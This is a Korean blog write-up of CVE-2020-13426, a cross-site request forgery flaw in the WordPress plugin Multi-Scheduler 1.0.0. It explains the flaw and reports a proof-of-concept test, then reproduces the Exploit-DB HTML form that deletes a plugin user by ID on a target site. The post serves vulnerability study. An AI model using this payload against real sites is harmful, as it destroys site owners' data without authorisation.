CVE Code: CVE-2020-13426
Vunerability Name: WordPress Plugin Multi-Scheduler 1.0.0 Cross Site Request Forgery
1. 개념
WordPress는 세계 최대의 오픈 소스 저작물 관리 시스템이며, 워드프레스 기반 웹사이트는 전 세계 웹사이트의 30%를 차지한다.
Multi-Scheduler는 이벤트 예약(약속, 회의, 인터뷰)을 관리하고 이를 위해 날짜, 달력, 사용자 목록, 주소 목록 및 보고서 생성을 관리할 수 있는 플러그인이다.
WordPress 플러그인 중 Multi-Scheduler 1.0.0 버전에서 취약점이 발견되었다.
2. 취약점 설명
CSRF 공격을 이용하여 삭제 요청을 보내 희생자의 사용자 목록을 삭제하는 취약점이다.
CSRF(Cross Site Request Forgery)
공격자가 인증된 희생자(Victim)에서 의도치 않은 Request 메시지를 발생시키도록 유도하는 공격
3. PoC 결과
- Multi-Scheduler 1.0.0에서 진행
- 기존 3명의 Professional이 존재
- Exploit-DB Code를 이용하여 CSRF Attack 수행
- 2명으로 줄어든 것 확인
4. Raw Data
POST / Wordpress/wp-admin/admin.php?page=msbdt_professional HTTP/1.1 |
5. Exploit Code
# Exploit Title: WordPress Plugin Multi-Scheduler 1.0.0 - Cross-Site Request Forgery (Delete User)
# Google Dork: N/A
# Date: 2020-05-21
# Exploit Author: UnD3sc0n0c1d0
# Vendor Homepage: https://www.bdtask.com/
# Software Link: https://downloads.wordpress.org/plugin/multi-scheduler.1.0.0.zip
# Category: Web Application
# Version: 1.0.0
# Tested on: CentOS 7 / WordPress 5.4.1
# CVE : N/A
# 1. Technical Description:
The Multi-Scheduler plugin 1.0.0 for WordPress has a Cross-Site Request Forgery (CSRF) vulnerability
in the forms it presents, allowing the possibility of deleting records (users) when an ID is known.
# 2. Proof of Concept (PoC):
<html>
<form method="POST" action="http://[TARGET]/wp-admin/admin.php?page=msbdt_professional">
<input type="hidden" value="[ID]" name="pro_delete_id"><br>
<input type="hidden" value="Delete" name="professional_delete">
<input type="submit" value="Delete user">
</form>
</html>
[참조]
취약점 설명: https://infayer.com/archivos/448
Exploit DB: https://www.exploit-db.com/exploits/48532
cxsecurity: https://cxsecurity.com/issue/WLB-2020050235
Reseaech LAB: https://research-labs.net/search/exploits/wordpress-plugin-multi-scheduler-100-cross-site-request-forgery-delete-user
'Hacking & Security > Vulnerability' 카테고리의 다른 글
DrayTek Vigor RCE Vulnerability (CVE-2020-8515) (3) | 2020.10.03 |
---|---|
Netlink GPON RCE Vulnerability (CVE-2018-10562) (4) | 2020.10.01 |
Comtrend VR-3033 Router RCE Vernerability (CVE-2020-10173) (0) | 2020.07.16 |
BIG IP F5 TMUI RCE Vulnerability (CVE-2020-5902) (3) | 2020.07.08 |
Zyxel NAS Command Injection(CVE-2020-9054) (0) | 2020.06.24 |
공부&일상 블로그
포스팅이 좋았다면 "좋아요❤️" 또는 "구독👍🏻" 해주세요! 질문은 언제나 환영입니다😊